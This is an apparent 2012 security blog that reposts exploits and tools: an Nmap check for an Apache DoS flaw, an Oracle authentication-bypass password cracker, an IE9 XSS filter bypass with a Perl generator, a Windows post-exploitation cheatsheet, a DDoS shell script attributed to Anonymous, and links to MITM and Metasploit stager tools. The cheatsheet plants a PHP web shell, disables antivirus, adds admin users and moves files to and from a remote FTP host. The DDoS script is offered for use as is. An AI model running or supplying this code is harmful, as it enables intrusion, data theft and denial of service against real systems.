Oct 19, 2012

Check DoS Vulnerability Of Apache Web Server Multiple Overlapping/simple ranges of a page[CVE-2011-3192] with NMAP NSE

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local vulns = require "vulns"

description = [[
Detects a denial of service vulnerability in the way the Apache web server
handles requests for multiple overlapping/simple ranges of a page.

References:
* http://seclists.org/fulldisclosure/2011/Aug/175
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
* http://nessus.org/plugins/index.php?view=single&id=55976
]]

---
-- @usage
-- nmap --script http-vuln-cve2011-3192.nse [--script-args http-vuln-cve2011-3192.hostname=nmap.scanme.org] -pT:80,443 <host>
--
-- @output
-- Host script results:
-- | http-vuln-cve2011-3192: 
-- |   VULNERABLE:
-- |   Apache byterange filter DoS
-- |     State: VULNERABLE
-- |     IDs:  CVE:CVE-2011-3192  OSVDB:74721
-- |     Description:
-- |       The Apache web server is vulnerable to a denial of service attack when numerous
-- |       overlapping byte ranges are requested.
-- |     Disclosure date: 2011-08-19
-- |     References:
-- |       http://seclists.org/fulldisclosure/2011/Aug/175
-- |       http://nessus.org/plugins/index.php?view=single&id=55976
-- |       http://osvdb.org/74721
-- |_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
--
-- @args http-vuln-cve2011-3192.hostname  Define the host name to be used in the HEAD request sent to the server
-- @args http-vuln-cve2011-3192.path  Define the request path

-- changelog
-- 2011-08-29 Duarte Silva <duarte.silva@serializing.me>
--   - Removed the "Accept-Encoding" HTTP header
--   - Removed response header printing
--   * Changes based on Henri Doreau and David Fifield sugestions
-- 2011-08-20 Duarte Silva <duarte.silva@serializing.me>
--   * First version ;)
-- 2011-11-07 Henri Doreau
--   * Use the vulns library to report results
-----------------------------------------------------------------------

author = "Duarte Silva <duarte.silva@serializing.me>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}


portrule =  shortport.http

action = function(host, port)
    local vuln = {
        title = 'Apache byterange filter DoS',
        state = vulns.STATE.NOT_VULN, -- default
        IDS = {CVE = 'CVE-2011-3192', OSVDB = '74721'},
        description = [[
The Apache web server is vulnerable to a denial of service attack when numerous
overlapping byte ranges are requested.]],
        references = {
            'http://seclists.org/fulldisclosure/2011/Aug/175',
            'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192',
            'http://nessus.org/plugins/index.php?view=single&id=55976',
        },
        dates = {
            disclosure = {year = '2011', month = '08', day = '19'},
        },
      }
    local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
    local hostname, path = stdnse.get_script_args('http-vuln-cve2011-3192.hostname',
        'http-vuln-cve2011-3192.path')

    if not path then
        path = '/'

        stdnse.print_debug(1, "Setting the request path to '/' since 'http-vuln-cve2011-3192.path' argument is missing.")
    end

    -- This first request will try to get a code 206 reply from the server by
    -- sending the innocuous header "Range: byte=0-100" in order to detect
    -- whether this functionality is available or not.
    local request_opts = {
        header = {
            Range = "bytes=0-100",
            Connection = "close"
        },
        bypass_cache = true
    }

    if hostname then
        request_opts.header.Host = hostname
    end

    local response = http.head(host, port, path, request_opts)

    if not response.status then
        stdnse.print_debug(1, "%s: Functionality check HEAD request failed for %s (with path '%s').",
            SCRIPT_NAME, hostname or host.ip, path)
    elseif response.status == 206 then
        -- The server handle range requests. Now try to request 11 ranges (one more
        -- than allowed).
        -- Vulnerable servers will reply with another code 206 response. Patched
        -- ones will return a code 200.
        request_opts.header.Range = "bytes=1-0,0-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"

        response = http.head(host, port, path, request_opts)

        if not response.status then
            stdnse.print_debug(1, "%s: Invalid response from server to the vulnerability check",
                SCRIPT_NAME)
        elseif response.status == 206 then
            vuln.state = vulns.STATE.VULN
        else
            stdnse.print_debug(1, "%s: Server isn't vulnerable (%i status code)",
                SCRIPT_NAME, response.status)
        end
    else
        stdnse.print_debug(1, "%s: Server ignores the range header (%i status code)",
            SCRIPT_NAME, response.status)
    end
    return vuln_report:make_output(vuln)
end
 
Source: https://svn.nmap.org/nmap/scripts/http-vuln-cve2011-3192.nse 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oracle Database Authentication Protocol Security Bypass - Packetstorm

Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol.

An attacker can exploit this issue to bypass the authentication process and gain unauthorized access to the database.

This vulnerability affects Oracle Database 11g Release 1 and 11g Release 2.


    #-*-coding:utf8 -*-
     
    import hashlib
    from Crypto.Cipher import AES
     
    def decrypt(session,salt,password):
            pass_hash = hashlib.sha1(password+salt)
     
            #......... ..... ..... .......... .. 24 ....
            key = pass_hash.digest() + '\x00\x00\x00\x00'
            decryptor = AES.new(key,AES.MODE_CBC)
            plain = decryptor.decrypt(session)
            return plain
     
    #............. ........... ...... 48 ....
    session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'
     
    #.... 10 ....
    salt_hex = 'A7193E546377EC56639E'
     
    passwords = ['test','password','oracle','demo']
     
    for password in passwords:
            session_id = decrypt(session_hex.decode('hex'),salt_hex.decode('hex'),password)
            print 'Decrypted session_id for password "%s" is %s' % (password,session_id.encode('hex'))
            if session_id[40:] == '\x08\x08\x08\x08\x08\x08\x08\x08':
                    print 'PASSWORD IS "%s"' % password
                    break





Source: http://packetstorm.igor.onlinedirect.bg/1210-exploits/oracledb-bypass.txt

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 18, 2012

Internet Explorer 9 XSS Filter Bypass

#################################################
Internet Explorer 9 XSS Filter Bypass
#################################################
Discovered by: Jean Pascal Pereira <pereira@secbiz.de>
Vendor information:
"Internet Explorer (formerly Microsoft Internet Explorer and Windows Internet Explorer, commonly
abbreviated IE or MSIE)
is a series of graphical web browsers developed by Microsoft and included as part of the Microsoft
Windows line of operating
systems, starting in 1995. It was first released as part of the add-on package Plus! for Windows 95
that year. Later versions
were available as free downloads, or in service packs, and included in the OEM service releases of
Windows 95 and later versions of Windows.."
Vendor URI: http://www.microsoft.com
#################################################
Issue: Cross Site Scripting Filter Bypass
-------------------------------------
Description:
The Internet Explorer 9 offers a feature to eliminate suspicious pattern passed to the website by a
parameter.
For example, we have the following script:
-------------------------------------
<?php
echo $_GET['a'];
?>
-------------------------------------
Let's call it "blah.php". Now we access the blah.php by using Internet Explorer 9 and try to execute a
malicious string:
http://localhost/ieb/blah.php?a=<script>alert(1)</script>
After this, we receive the message "Internet Explorer has modified this page to help prevent cross-
site scripting".
The JavaScript won't be executed.
-------------------------------------
Proof Of Concept:
This trick may be known to some of you. Internet Explorer allows stripping tags by inserting
nullbytes.
For example, the following string will be executed:
3C 73 00 63 72 69 70 74 3E 61 6C 65 72 74 28 31 29 3C 2F 73 00 63 72 69 70 74 3E
Which is actually "<s[NULL]cript>alert(1)</s[NULL]cript>".
However, we won't be able to insert the nullbytes directly in the URI. The following example won't
work:
http://localhost/ieb/blah.php?a=<script>alert(1)</script>
But there is still another possibility. Grab a hex editor and create a file looking like the example
given below:
<a href='http://localhost/ieb/blah.php?a=<s[NULL]cript>alert(1)</s[NULL]cript>'>Clickme</a>
If you open the file and click the provided link, the script will be executed.
-------------------------------------
Exploit (for the lazy folks):
-------------------------------------
#!/usr/bin/perl
use strict;
use warnings;
# Internet Explorer 9 XSS Filter Bypass Generator
# Credit: Jean Pascal Pereira <pereira[at]secbiz.de>
# http://0xffe4.org
my $target  = shift || die("No target defined");
my $payload = shift || die("No payload defined");
my $lnk_txt = shift || "Click me :)";
open(OUT, ">:raw", "out.html");
print OUT "\x3C\x61\x20\x68\x72\x65\x66\x3D\x27";
print OUT $target;
print OUT "\x3C\x73\x00\x63\x72\x69\x70\x74\x3E";
print OUT $payload;
print OUT "\x3C\x2F\x73\x00\x63\x72\x69\x70\x74\x3E\x27\x3E";
print OUT $lnk_txt;
print OUT "\x3C\x2F\x61\x3E";
close(OUT);
-------------------------------------
Example usage is:
iefilter.pl http://www.example.com?var= alert(1)
-------------------------------------
Note:
Exploitation via <a href="ja[NULL]vascript:... links is also possible.
-------------------------------------
Solution:
Currently, no solution is available for this issue.
-------------------------------------
#################################################
< http://0xffe4.org >


# 1337day.com [2012-10-18]


Source: http://1337day.com/exploit/19579

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Post Exploit By Stormsecurity

View your current user: whoami
View information about the current user: net user myuser(for a local user)
net user myuser /domain (for a domain user)
View the local groups: net localgroup
View the local administrators: net localgroup Administrators
Add a new user: net user myuser mypass /add
Add a user in the local Administrators group: net localgroup Administrators myuser /add
View the domain name of current machine: net config workstation
net config server
View the name of the domain controller: reg query "HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\ CurrentVersion\Group Policy\ History" /v DCName
View the list of domain admins: net group "Domain Admins" /domain
View the list of started services (search for antivirus): net start
sc query
Stop a service: net stop "Symantec Endpoint Protection"
View the list of started processes and the owner: tasklist /v
Kill a process by its name taskkill /F /IM "cmd.exe"
Abort a shutdown/restart countdown shutdown /a
Create php backdoor/shell echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php
Download an executable from a remote FTP server echo open 10.1.2.3> C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo get nc.exe>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:script.txt
Upload a file to a remote FTP server echo open 10.1.2.3> C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo put E:\backups\database.dbf>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:script.txt
View established connections of current machine: netstat -a -n -p tcp | find "ESTAB"
View open ports of current machine: netstat -a -n -p tcp | find "LISTEN"
netstat -a -n -p udp
View network configuration: netsh interface ip show addresses
netsh interface ip show route
netsh interface ip show neighbors
View current network shares: net share
Mount a remote share with the rights of the current user: net use K: \\10.1.2.3\C$
dir K:
Enable Remote Desktop: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


Source: http://stormsecurity.wordpress.com/2012/06/05/manual-pentesting-cheatsheet-windows/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

DDOS make requests through google servers By Anonymous

Anonymous DDoS tool[shell script] pasted in the pastebin.com, try it with your risk.

#!/bin/bash


#  Follow @AnonymousOwn3r  #
# https://twitter.com/AnonymousOwn3r #


function start {
    echo "[*] Sending `echo $2` Requests..."
    
    for a in `seq $2`
    do
        id=$((RANDOM%3999999+3000000))
        nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
        nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    done

    echo "[*] Still attacking `echo $urlclear`"
    echo "[*] Sleeping for 10 Seconds"
    sleep 10
    start url $2 urlclear
}

echo ''
echo '             88888888ba,    88888888ba,                  ad88888ba  ' 
echo '    aa      88      `"8b   88      `"8b                d8"     "8b  '
echo '    88      88        `8b  88        `8b               Y8,          '
echo 'aaaa88aaaa  88         88  88         88   ,adPPYba,   `Y8aaaaa,    '
echo '""""88""""  88         88  88         88  a8"     "8a    `"""""8b,  '
echo '    88      88         8P  88         8P  8b       d8          `8b  '
echo '    ""      88      .a8P   88      .a8P   "8a,   ,a8"  Y8a     a8P  '
echo '            88888888Y""    88888888Y""     `"YbbdP""    "Y88888P"'
echo ''

if [ "$#" -lt 2 ]; then
    echo "Usage: $0 <big file> <Requests>"
    echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
    echo ""

    exit 0                                                                                                                                                                          
fi                                                                                                                                                                                  
                                                                                                                                                                                    
case $2 in                                                                                                                                                                          
    *[!0-9]* )  echo "$2 is not numeric" && exit 1;;                                                                                                                                
esac                                                                                                                                                                                
                                                                                                                                                                                    
echo "Attack -->" $1                                                                                                                                                                
match1=/                                                                                                                                                                            
repl1=%2F                                                                                                                                                                           
match2=:                                                                                                                                                                            
repl2=%3A                                                                                                                                                                           
url=$1                                                                                                                                                                              
urlclear=$1                                                                                                                                                                         
                                                                                                                                                                                    
url=${url//$match1/$repl1}                                                                                                                                                          
url=${url//$match2/$repl2}                                                                                                                                                          
                                                                                                                                                                                    
echo ""                                                                                                                                                                             
echo "[*] Loop started! CTRL+C to stop"                                                                                                                                             
echo ""

start url $2 urlclear


Source: http://pastebin.com/92ZJ0CvD



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 17, 2012

Fingerprint website with web application

Next generation web scanner. WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1000 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.



Source: http://whatweb.net/

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Evilgrade Proxy [Ruby] by bigmac

This tool use for Man-In-The-Middle Attack with Metasploit + Proxy that intercept traffic exe file and change exe file to malware that create from Metasploit. This tool was created by bigmac and he's post on pastebin.

Source:  http://pastebin.com/n7AHi5Ny

Download: http://dl.dropbox.com/u/2330423/evilgrade_ruby.rb

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 15, 2012

Metasploit stager: reverse_https with basic authentication against proxy

If you want to get all the details and want example, please go to the Source.

Unlike NTLM, the username and password used during a basic authentication remains in the scope of the process (example: in your browser, after a successful authentication against the proxy server). This is the reason why reverse_http(s) doesn’t know anything about this password. Instead, reverse_http(s) stager use WinInet API to let Windows manages how to reach the Internet.
Back to our basic authentication mechanism, this customized version of reverse_https will let you embed a valid username and password inside the payload, to allow proper basic authentication against the proxy server. The proxy settings (IP, port, proxy.pac, …) are automatically managed by WinInet.



Download Link: http://funoverip.net/wp-content/uploads/2012/10/reverse_https_proxy_basicauth.tar.gz

Source:  http://funoverip.net/2012/10/metasploit-stager-reverse_https-basic-authentication-against-proxy/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

adbdSecure - Malicious Toolkit Thwarted

Malicious Toolkit Thwarted by adbdSecure

malicious toolkit by Kos recently appeared in the wild called P2P ADB, which provides tools for attacking a device if ADB Debugging is left enabled on the other device. Here is a breakdown of what this toolkit enables by taking advantage of USB Debug Mode, Root, and some crafty hacks:
  • the bypassing of lock screens,
  • making system changes and even “backing up” Android profiles, all from one phone to another
  • perform an Auth token cloning attack, enabling an attacker to gain access to a victims Google account, change the password, or even setup a one-time-password for themselves if two-factor-authentication is enabled
XDA Elite Recognized Developer Stericson immediately recognized the danger and created adbdSecure. His application helps to guard your device from malicious attacks that seek to use adbd, but only does so when you have enabled a password, PIN, or pattern lock for your lock screen. adbdSecure will turn adbd on when the phone is unlocked and will turn it back off when the screen goes off, thus preventing any sort of intrusion on your device. Add Tasker into the equation, and you have a pretty versatile application for all sorts of protection.
And in the true nature of XDA, Stericson has open-sourced the application so that you can take what he has done and improve it, as well as contribute more to the community. You can find the source on GitHub, and download the application for your device on Google Play. And once again, the only way to protect your device from this attack is to take the initiative and add lock screen protection.


Source: http://www.xda-developers.com/android/malicious-toolkit-thwarted-by-adbdsecure/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Server Shield v1.0.4 - Hardening Linux Server

Server Shield v1.0.4
Server Shield is a lightweight method of protecting and hardening your Linux server. It is easy to install, hard to mess up, and makes your server instantly and effortlessly resilient to many basic and advanced attacks.
IP address and ethernet interface are automatically detected. Support for servers with multiple IP addresses will be added soon.
Features
  • Firewall Hardening
  • TCP Hardening
  • Data Leakage Protection
  • ICMP/Ping Flood Protection
  • Rootkit Protection
  • DoS Protection
  • Spoof Protection
  • Bogus TCP Protection
  • SYN Flood Protection
Source: https://github.com/Brian-Holt/server-shield


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |